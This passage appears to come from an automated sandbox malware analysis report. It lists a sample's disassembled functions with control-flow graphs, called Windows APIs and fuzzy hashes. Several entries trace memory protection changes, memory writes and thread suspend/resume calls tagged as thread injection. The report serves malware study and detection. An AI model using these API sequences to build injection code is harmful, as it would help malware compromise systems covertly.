                          control_flow_graph 629 8104cc-8104e0 630 8104e2-81050d NtAllocateVirtualMemory 629->630 631 810526-81052e 629->631 632 810521-810522 630->632 633 81050f-81051f 630->633 632->631 633->631
                          APIs
                          • NtAllocateVirtualMemory.NTDLL ref: 00810509
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID: @
                          • API String ID: 2167126740-2766056989
                          • Opcode ID: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                          • Instruction ID: 7d02e0e189f80185fc29b250cd56b1631ea88fd10ba0a9f0bc032ff7f5a4bdfc
                          • Opcode Fuzzy Hash: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                          • Instruction Fuzzy Hash: 0EF09070614A088BDB449FA8D8CC6BA76E1FF5C305F40096DE10ADB254DBB8C9848B46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0082F002 Relevance: 3.3, APIs: 2, Instructions: 334nativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 636 82f002-82f063 638 82f069-82f082 636->638 639 82f33d-82f355 636->639 640 82f237-82f282 NtProtectVirtualMemory 638->640 641 82f088-82f091 638->641 649 82f358-82f36a 639->649 644 82f288-82f289 640->644 645 82f31c-82f31e 640->645 641->640 642 82f097-82f09f 641->642 647 82f0a2-82f0ae 642->647 646 82f28d-82f28f 644->646 648 82f320-82f33b 645->648 645->649 646->649 650 82f295-82f299 646->650 651 82f0b0-82f0b1 647->651 652 82f0cc-82f0fa 647->652 648->649 653 82f2b1-82f2b5 650->653 654 82f29b-82f2af 650->654 655 82f0b3-82f0ca 651->655 661 82f100-82f111 652->661 662 82f228-82f229 652->662 658 82f2b7-82f2cb 653->658 659 82f2cd-82f2ce 653->659 657 82f2d0-82f316 NtProtectVirtualMemory 654->657 655->652 655->655 657->645 657->646 658->657 659->657 663 82f113-82f118 661->663 664 82f11e-82f13a 661->664 665 82f22e-82f231 662->665 663->664 666 82f204-82f205 663->666 667 82f140-82f17e 664->667 668 82f20c-82f220 664->668 665->640 665->649 666->668 672 82f180-82f188 667->672 673 82f1a7-82f1c3 667->673 668->647 669 82f226 668->669 669->665 674 82f193-82f1a4 672->674 675 82f18a-82f191 672->675 677 82f1c5 673->677 678 82f1c8-82f1ca 673->678 674->673 675->674 675->675 677->678 679 82f1fe-82f1ff 678->679 680 82f1cc-82f1ee 678->680 679->666 680->668 681 82f1f0-82f1f9 680->681 681->667
                          APIs
                          • NtProtectVirtualMemory.NTDLL ref: 0082F27A
                          • NtProtectVirtualMemory.NTDLL ref: 0082F309
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078960636.000000000082F000.00000040.80000000.00040000.00000000.sdmp, Offset: 0082F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_82f000_control.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 4578fbfbe2845bb9683d85fa29efcc9a2ae82d964b861cac278506f9b548278c
                          • Instruction ID: 420e81aed946faf48a5be3673e94056e3e8689418946f89aac21fa8914812b75
                          • Opcode Fuzzy Hash: 4578fbfbe2845bb9683d85fa29efcc9a2ae82d964b861cac278506f9b548278c
                          • Instruction Fuzzy Hash: 19A1F13120CB988FC725DF28E8856A9B7F1FB96300F58457ED58BC7253D634A886C782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007FB4B8 Relevance: 1.8, APIs: 1, Instructions: 292memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                          • Instruction ID: 77127a37dd4469a27a4d80e89fb86e93a75058cea506b3716359d55b624a335a
                          • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                          • Instruction Fuzzy Hash: 9A818230718B0D8FE768EF28D89967A33E5FB98311F24452EE54AC3261EF78D8468741
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0081A148 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtQueryInformationProcess.NTDLL ref: 0081A16E
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: InformationProcessQuery
                          • String ID:
                          • API String ID: 1778838933-0
                          • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                          • Instruction ID: 4ed664ebf2a449b08974d3a18016d3e2b0fe78343e59c997b4c2c55024f03759
                          • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                          • Instruction Fuzzy Hash: 45018130319E4D9F9B88EF68D5C4B65B3E8FFA8305B40016EA40AC3124D774D8C1CB02
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008041D8 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: SectionView
                          • String ID:
                          • API String ID: 1323581903-0
                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                          • Instruction ID: f353d06753c5583719d8bcaaf728a806513d2dca57b1699c60ca5cc47c3fc633
                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                          • Instruction Fuzzy Hash: 400112B0A08B048FCB48EF68D0C8569BBE0FB58311B10066FE949CB796DB30D885CB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F40C0 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: MemoryReadVirtual
                          • String ID:
                          • API String ID: 2834387570-0
                          • Opcode ID: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                          • Instruction ID: c03ebca3bc83756757ea49345bc6346ef35b3886f1de9fbf93ea1b75cb4bed79
                          • Opcode Fuzzy Hash: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                          • Instruction Fuzzy Hash: 7AE04F34715B888BEB00ABB88CCD63E73D5F799305F604879EA55C7361DA2EC8958742
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F6D24 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL ref: 007F6D43
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                          • Instruction ID: a7c1f3a228d9be45fbde5f1712cb73a2fef4feaa49fc5c1e7995e1509dcfce8a
                          • Opcode Fuzzy Hash: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                          • Instruction Fuzzy Hash: A1E04874715A484BDF14AFB488CD23973D1F748305F10043AE645C7364D62DC8855742
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007FECA8 Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 144 7feca8-7fed1b call 7fe53c call 7f495c 149 7fed1d-7fed3d call 7f9660 144->149 150 7fed43-7fed4e 144->150 149->150 159 7feec7-7feecb 149->159 152 7fed5e-7fed80 call 7f40c0 150->152 153 7fed50-7fed5c call 7fb11c 150->153 162 7feebf-7feec5 152->162 163 7fed86-7fed8c 152->163 153->152 160 7feecd-7feece 159->160 161 7feed7-7feef4 159->161 160->161 162->159 164 7feeb8-7feebd 163->164 165 7fed92-7fedb7 VirtualProtectEx 163->165 164->159 167 7fedb9-7fedd1 call 7f4a48 165->167 168 7fedd3 165->168 170 7fedd5-7fedd7 167->170 168->170 170->162 172 7feddd-7fede3 170->172 173 7fede8-7fee22 ResumeThread SuspendThread 172->173 175 7fee37-7fee39 173->175 176 7fee24-7fee2f 173->176 177 7fee3b-7fee43 175->177 178 7fee45-7fee4d 175->178 176->175 177->173 177->178 180 7fee4f-7fee54 178->180 181 7fee56-7fee6d call 7f9660 178->181 182 7fee6f-7fee9c VirtualProtectEx 180->182 181->182 182->159 185 7fee9e-7feeb6 call 7f4a48 182->185 185->159
                          APIs
                            • Part of subcall function 007F495C: FindCloseChangeNotification.KERNELBASE ref: 007F4A08
                          • VirtualProtectEx.KERNELBASE ref: 007FEDAF
                          • ResumeThread.KERNELBASE ref: 007FEDEC
                          • SuspendThread.KERNELBASE ref: 007FEE0F
                          • VirtualProtectEx.KERNELBASE ref: 007FEE8C
                            • Part of subcall function 007F4A48: VirtualProtectEx.KERNELBASE ref: 007F4A9C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
                          • String ID:
                          • API String ID: 4107391026-0
                          • Opcode ID: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                          • Instruction ID: 60fc0926890578c0e9ea5a6b82bc50a7726d9d1dda2f9ca446a59ac3019f187d
                          • Opcode Fuzzy Hash: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                          • Instruction Fuzzy Hash: 9761803061CA4C8FD768EB28E8857BA73D5FB98315F10052DE68AC3261DF38D9468B46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F25C0 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 228 7f25c0-7f25ea call 81c930 231 7f2705-7f271c 228->231 232 7f25f0-7f2607 call 81887c 228->232 235 7f260d-7f2622 232->235 236 7f26f1-7f26fd 232->236 237 7f2626-7f262a 235->237 236->231 238 7f262c-7f2646 237->238 239 7f2648-7f2655 237->239 238->239 240 7f265d-7f2668 238->240 239->236 241 7f265b 239->241 240->236 242 7f266e-7f26a1 CreateFileA 240->242 241->237 242->236 243 7f26a3-7f26b6 SetFilePointer 242->243 244 7f26e8-7f26eb FindCloseChangeNotification 243->244 245 7f26b8-7f26d8 ReadFile 243->245 244->236 245->244 246 7f26da-7f26df 245->246 246->244 247 7f26e1-7f26e6 246->247 247->244
                          APIs
                          • CreateFileA.KERNELBASE ref: 007F2694
                          • SetFilePointer.KERNELBASE ref: 007F26AE
                          • ReadFile.KERNELBASE ref: 007F26D0
                          • FindCloseChangeNotification.KERNELBASE ref: 007F26EB
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                          • String ID:
                          • API String ID: 2405668454-0
                          • Opcode ID: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                          • Instruction ID: 75aa89038b6bf0b440d3bd92f51d062c1a216fef6ed6873c662f4f05e9ac741b
                          • Opcode Fuzzy Hash: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                          • Instruction Fuzzy Hash: 3B41A730218A0C4FDB58DF28D8C463577E1FB98315B24466EE59AC3666DB39D8478B42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F1930 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 248 7f1930-7f1982 250 7f1b19 248->250 251 7f1988-7f198b 248->251 252 7f1b1e-7f1b34 250->252 253 7f198d-7f1993 251->253 254 7f1995-7f1998 253->254 255 7f19e0-7f19e2 253->255 258 7f199a-7f199d 254->258 259 7f19c6-7f19c8 254->259 256 7f19eb-7f19ee 255->256 257 7f19e4-7f19e9 255->257 262 7f19f4-7f1a16 256->262 263 7f1b00 256->263 257->256 258->259 264 7f199f-7f19a1 258->264 260 7f19ca-7f19d1 259->260 261 7f19d3-7f19d4 259->261 260->261 266 7f19d7-7f19de 261->266 273 7f1a1c-7f1a29 262->273 274 7f1af9-7f1afe 262->274 265 7f1b05-7f1b17 RtlDeleteBoundaryDescriptor 263->265 267 7f19a3-7f19a6 264->267 268 7f19c2-7f19c4 264->268 265->252 266->253 266->255 267->256 269 7f19a8-7f19b3 267->269 268->266 271 7f19b8-7f19bf 269->271 272 7f19b5 269->272 271->268 272->271 275 7f1a2f-7f1a35 273->275 276 7f1aec-7f1af7 273->276 274->265 277 7f1a37-7f1a8b 275->277 276->265 280 7f1a8d-7f1a8e 277->280 281 7f1ac3-7f1ae1 277->281 282 7f1a90-7f1a9f lstrcmp 280->282 281->277 288 7f1ae7-7f1ae8 281->288 283 7f1abc 282->283 284 7f1aa1-7f1ab8 282->284 287 7f1abe-7f1abf 283->287 284->282 286 7f1aba 284->286 286->287 287->281 288->276
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: BoundaryDeleteDescriptorlstrcmp
                          • String ID:
                          • API String ID: 735288309-3916222277
                          • Opcode ID: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                          • Instruction ID: 9845a8549d3875e3b1e869d05e0ff9e859102d290a2c7555a6f955540f473ed2
                          • Opcode Fuzzy Hash: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                          • Instruction Fuzzy Hash: 1551593161CA8C8BD72CAE1C9C8627973D5E789311FA4413EDADAC3351DA29AC5387C2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0080D43C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 289 80d43c-80d483 call 817004 292 80d522-80d529 289->292 293 80d489-80d4ba RegQueryValueExA 289->293 294 80d52b-80d533 292->294 295 80d55d-80d565 292->295 296 80d4c3-80d4cc call 81772c 293->296 297 80d4bc-80d4c1 293->297 298 80d553 294->298 299 80d535-80d551 call 809684 294->299 300 80d5d5-80d5e4 295->300 301 80d567-80d580 295->301 302 80d4d1-80d4e0 296->302 297->296 297->302 298->295 299->295 299->298 310 80d582-80d5c4 301->310 311 80d5ce-80d5cf 301->311 305 80d4e2-80d515 302->305 306 80d517-80d518 302->306 305->306 306->292 310->311 311->300
                          APIs
                            • Part of subcall function 00817004: RegCreateKeyA.ADVAPI32(?,?,?,00819153), ref: 00817027
                          • RegQueryValueExA.KERNELBASE ref: 0080D4B0
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateQueryValue
                          • String ID: ($(
                          • API String ID: 2711935003-222463766
                          • Opcode ID: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                          • Instruction ID: 935dca7d8651dc1de8318c7ab6a707e6bd98a53a717e07a2f512f696085cb7f9
                          • Opcode Fuzzy Hash: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                          • Instruction Fuzzy Hash: B641B6706187488FE744EF58EC986A673E5FB98309F00C52DD88AC32A0DF78DA45CB46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007FB7C0 Relevance: 4.6, APIs: 3, Instructions: 101registrymemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 312 7fb7c0-7fb811 RegQueryValueExA 313 7fb819-7fb831 RtlAllocateHeap 312->313 314 7fb813-7fb817 312->314 316 7fb86a-7fb891 RegQueryValueExA 313->316 317 7fb833 313->317 315 7fb84d-7fb869 314->315 318 7fb836-7fb839 316->318 319 7fb893-7fb89d 316->319 317->318 318->315 320 7fb83b-7fb845 318->320 319->315 320->315
                          APIs
                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 007FB803
                          • RtlAllocateHeap.NTDLL ref: 007FB825
                          • RegQueryValueExA.KERNELBASE ref: 007FB887
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: QueryValue$AllocateHeap
                          • String ID:
                          • API String ID: 2311914766-0
                          • Opcode ID: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                          • Instruction ID: 74a181415634453580c9a0acba77c83877f2c13bc25e233603fe93faa21e82d8
                          • Opcode Fuzzy Hash: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                          • Instruction Fuzzy Hash: 0A31843161CB088FEB58EF18D489666B7E1FBA8311F11456EE949C3251DF74DC458B82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0081E2C4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 545 81e2c4-81e341 546 81e343-81e363 545->546 547 81e368-81e394 545->547 552 81e59a-81e5b1 546->552 548 81e396-81e3a8 547->548 549 81e3aa-81e3ae 547->549 551 81e3b2-81e3be 548->551 549->551 553 81e3c0-81e3cf 551->553 554 81e3dc-81e3df 551->554 566 81e570-81e57a 553->566 567 81e3d5-81e3d6 553->567 555 81e4b3-81e4bb 554->555 556 81e3e5-81e3e8 554->556 559 81e4bd-81e4ca 555->559 560 81e4cc-81e4cf 555->560 557 81e3ea-81e3fa 556->557 558 81e3fc-81e40d LoadLibraryA 556->558 557->558 562 81e467-81e471 557->562 558->562 563 81e40f-81e423 558->563 559->560 564 81e4d5-81e4d8 560->564 565 81e56c-81e56d 560->565 574 81e4a3-81e4a4 562->574 575 81e473-81e477 562->575 581 81e425-81e435 563->581 582 81e437-81e462 563->582 572 81e503-81e517 564->572 573 81e4da-81e4dd 564->573 565->566 568 81e597-81e598 566->568 569 81e57c-81e591 566->569 567->554 568->552 569->568 572->565 586 81e519-81e52d 572->586 573->572 579 81e4df-81e4ea 573->579 577 81e4ac-81e4ad 574->577 576 81e479-81e48a 575->576 575->577 576->577 588 81e48c-81e4a1 576->588 577->555 579->572 583 81e4ec-81e4f1 579->583 581->562 581->582 582->552 583->572 584 81e4f3-81e4f8 583->584 584->572 587 81e4fa-81e501 584->587 592 81e53c-81e53f 586->592 593 81e52f-81e53a 586->593 587->565 587->572 588->577 592->565 594 81e541-81e568 592->594 593->592 594->565
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: H
                          • API String ID: 1029625771-2852464175
                          • Opcode ID: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                          • Instruction ID: 4de0599c6e34ed812fd9b06f6685030a755a453a2929b94e2857c8dafbd8915b
                          • Opcode Fuzzy Hash: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                          • Instruction Fuzzy Hash: 00A18130508F0A8FEB55DF58D8886A6B7E5FF98315F00462ED84AC7261EF34D981CB85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F1B38 Relevance: 3.2, APIs: 2, Instructions: 203memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 682 7f1b38-7f1b80 call 81887c 685 7f1d09-7f1d0e 682->685 686 7f1b86-7f1b9f call 817340 682->686 687 7f1d12-7f1d32 685->687 691 7f1cff-7f1d07 686->691 692 7f1ba5-7f1bd6 call 800af0 686->692 691->687 692->687 696 7f1bdc-7f1be4 692->696 697 7f1c5f-7f1c8e VirtualProtect 696->697 698 7f1be6-7f1beb 696->698 699 7f1c9d-7f1cf5 call 81a148 697->699 700 7f1c90-7f1c98 call 7ffd58 697->700 698->697 701 7f1bed-7f1bff call 7f634c 698->701 699->687 713 7f1cf7-7f1cfd 699->713 700->699 701->697 706 7f1c01-7f1c19 call 817340 701->706 706->697 711 7f1c1b-7f1c59 VirtualProtect 706->711 711->697 713->687
                          APIs
                            • Part of subcall function 00817340: VirtualProtect.KERNELBASE ref: 00817373
                          • VirtualProtect.KERNELBASE ref: 007F1C59
                          • VirtualProtect.KERNELBASE ref: 007F1C7C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                          • Instruction ID: bcccec8ebf3a1846b288b71d040015f5d8923ec64d144200dc98cd347bd8da20
                          • Opcode Fuzzy Hash: 82c18c6e6fa7bbc15f18fe96c22df7e925fd8627ec72f289340420d94a56c73c
                          • Instruction Fuzzy Hash: 8E517D70618F098FD748EF29D889725B7E4FB98311F50056EE94AC3361EB38E941CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007FBC00 Relevance: 3.2, APIs: 2, Instructions: 152COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 714 7fbc00-7fbc4e 715 7fbc58-7fbc6b call 8023db 714->715 716 7fbc50-7fbc51 714->716 719 7fbcaf-7fbce8 call 7f65e4 715->719 720 7fbc6d-7fbc7f StrRChrA 715->720 716->715 726 7fbd0e-7fbd16 719->726 727 7fbcea-7fbcf0 719->727 722 7fbc86-7fbc87 720->722 723 7fbc81-7fbc84 720->723 724 7fbc8d-7fbca9 call 7fa9c8 722->724 723->724 724->719 728 7fbd18-7fbd22 726->728 729 7fbd24-7fbd4a 726->729 727->726 731 7fbcf2-7fbcfa 727->731 728->729 732 7fbd8f-7fbd99 728->732 739 7fbd4c-7fbd53 call 7fbdbc 729->739 740 7fbd83-7fbd89 729->740 731->726 733 7fbcfc-7fbd01 731->733 734 7fbd9b-7fbda2 732->734 735 7fbda9-7fbdba 732->735 738 7fbd03-7fbd0c 733->738 734->735 738->726 738->738 739->740 747 7fbd55-7fbd5c 739->747 748 7fbd8b-7fbd8d 740->748 749 7fbd5e-7fbd6e RtlAddVectoredContinueHandler 747->749 750 7fbd74-7fbd77 call 7feef8 747->750 748->732 748->735 749->750 752 7fbd7c-7fbd81 750->752 752->740 752->748
                          APIs
                          • StrRChrA.KERNELBASE ref: 007FBC73
                          • RtlAddVectoredContinueHandler.NTDLL ref: 007FBD67
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ContinueHandlerVectored
                          • String ID:
                          • API String ID: 3758255415-0
                          • Opcode ID: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                          • Instruction ID: 91d9a939d3650cde6c733805d323e26a667fc54afb21114cbc24c0605643f2a1
                          • Opcode Fuzzy Hash: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                          • Instruction Fuzzy Hash: BE41B230608A498FEB65EF38D88867A77E1FB98305B65452E954AC3365DF7CC802CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00808A08 Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018944,00808F1E,?,?,?,?,?,?,0000007E,007FF548), ref: 00808A6C
                          • RegCloseKey.KERNELBASE ref: 00808AEF
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CloseOpen
                          • String ID:
                          • API String ID: 47109696-0
                          • Opcode ID: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                          • Instruction ID: 88b3d5e15b00518886a1ff427b7cc3cf861cb3e658763451a6c209e5c048a1c8
                          • Opcode Fuzzy Hash: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                          • Instruction Fuzzy Hash: 6D314130618B0C8FD794EF68D894A6A77E1FBA8310B054A7EE44EC3251DF34D945CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00818678 Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00801105), ref: 008186B6
                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00801105), ref: 00818723
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                          • Instruction ID: 67d26fe58bb78ee08e0e63e6d7cc912671b2dda44162be372a1c6d8578fb1d6b
                          • Opcode Fuzzy Hash: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                          • Instruction Fuzzy Hash: 70215130618B088FD758EF28E849666B7E1FB98351F20486EE44EC3661DF34E981CB42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00817004 Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyA.ADVAPI32(?,?,?,00819153), ref: 00817027
                          • RegOpenKeyA.ADVAPI32(?,?,?,00819153), ref: 00817034
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateOpen
                          • String ID:
                          • API String ID: 436179556-0
                          • Opcode ID: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                          • Instruction ID: 6d0d612ec8a39a91945c2b859118abfe2d398e43a80951ee7bd769482a94cd7e
                          • Opcode Fuzzy Hash: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
